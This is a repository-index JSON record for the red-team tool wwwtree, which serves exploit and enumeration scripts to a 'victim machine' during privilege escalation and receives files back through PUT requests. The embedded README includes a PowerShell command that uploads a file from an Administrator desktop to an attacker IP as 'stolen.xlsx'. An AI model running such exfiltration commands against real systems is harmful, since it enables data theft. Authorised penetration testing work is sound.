{"id":13845185,"url":"https://github.com/t3l3machus/wwwtree","last_synced_at":"2025-05-07T15:21:08.805Z","repository":{"id":107324503,"uuid":"568924164","full_name":"t3l3machus/wwwtree","owner":"t3l3machus","description":"A utility for quickly and easily locating, web hosting and transferring resources (e.g., exploits/enumeration scripts) from your filesystem to a victim machine during privilege escalation.","archived":false,"fork":false,"pushed_at":"2024-07-19T05:11:30.000Z","size":40,"stargazers_count":178,"open_issues_count":0,"forks_count":31,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-03-31T11:21:10.210Z","etag":null,"topics":["hacking","hacking-tools","offensive-security","pentest","pentesting-tools","redteam","redteam-tools"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/t3l3machus.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-11-21T17:46:47.000Z","updated_at":"2025-03-13T03:18:32.000Z","dependencies_parsed_at":null,"dependency_job_id":"f1f23e48-21db-48d4-8818-dfaaea73c6f1","html_url":"https://github.com/t3l3machus/wwwtree","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/t3l3machus%2Fwwwtree","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/t3l3machus%2Fwwwtree/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/t3l3machus%2Fwwwtree/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/t3l3machus%2Fwwwtree/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/t3l3machus","download_url":"https://codeload.github.com/t3l3machus/wwwtree/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252902718,"owners_count":21822288,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking","hacking-tools","offensive-security","pentest","pentesting-tools","redteam","redteam-tools"],"created_at":"2024-08-04T17:03:15.496Z","updated_at":"2025-05-07T15:21:08.784Z","avatar_url":"https://github.com/t3l3machus.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# wwwtree\n[![Python](https://img.shields.io/badge/Python-%E2%89%A5%203.x-yellow.svg)](https://www.python.org/) \n\u003cimg src=\"https://img.shields.io/badge/Developed%20on-kali%20linux-blueviolet\"\u003e\n[![License](https://img.shields.io/badge/License-MIT-red.svg)](https://github.com/t3l3machus/wwwtree/blob/main/LICENSE)\n\u003cimg src=\"https://img.shields.io/badge/Maintained%3F-Yes-96c40f\"\u003e\n\n## Purpose\nA utility for quickly and easily locating, web hosting and transferring resources (e.g., exploits/enumeration scripts) from your filesystem to a victim machine during privilege escalation.\n\n### Video Presentation\nhttps://www.youtube.com/watch?v=iog-eb_N0Hg\n\n### Preview\n![image](https://user-images.githubusercontent.com/75489922/204158750-90ad250c-7787-4fde-92c3-99dae65e5444.png)\n\n## Description\nwwwtree does the following:\n - hosts a specified root directory and prints the contents in a tree-like format. Every file is translated to it's equivalent server URL path so you can quickly copy it and use a web client to transfer it to the victim.\n - Filters out files that contain specific substrings based on user provided keywords (use `-k` to parse comma seperated values). Handy for quickly locating resources saved in deep and populated directory structures.\n - Automatically hides from the output files and folders that are most likely not in the scope of enumeration / exploitation (e.g., txt, yml, docx files or .git directories). You can control this behaviour by editing the list variables `hide_extensions` and `hide_dirs` in the source.\n - The wwwtree python http server handler supports PUT requests and by default saves files in `/tmp` (you can change that in the source). You can use it to transfer files from the victim to the attacker machine.\n\n\n## Installation \u0026 Usage\n```\ngit clone https://github.com/t3l3machus/wwwtree\ncd ./wwwtree\npip3 install -r requirements.txt\nchmod +x wwwtree.py\n\nwwwtree.py [-h] -r ROOT_PATH -i INTERFACE [-l LEVEL] [-p PORT] [-k KEYWORDS] [-A] [-q]\n```\n\n### PUT Requests\nI've noticed that curl on Windows seems to work improperly when trying to transfer large files. Powershell's `Invoke-WebRequest` works much better:\n```\npowershell -c \"invoke-webrequest -method PUT -headers @{'Content-Type'='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'} -usebasicparsing -uri http://192.168.111.135/stolen.xlsx -body (get-content C:\\Users\\Administrator\\Desktop\\some_file.xlsx)\"\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ft3l3machus%2Fwwwtree","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ft3l3machus%2Fwwwtree","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ft3l3machus%2Fwwwtree/lists"}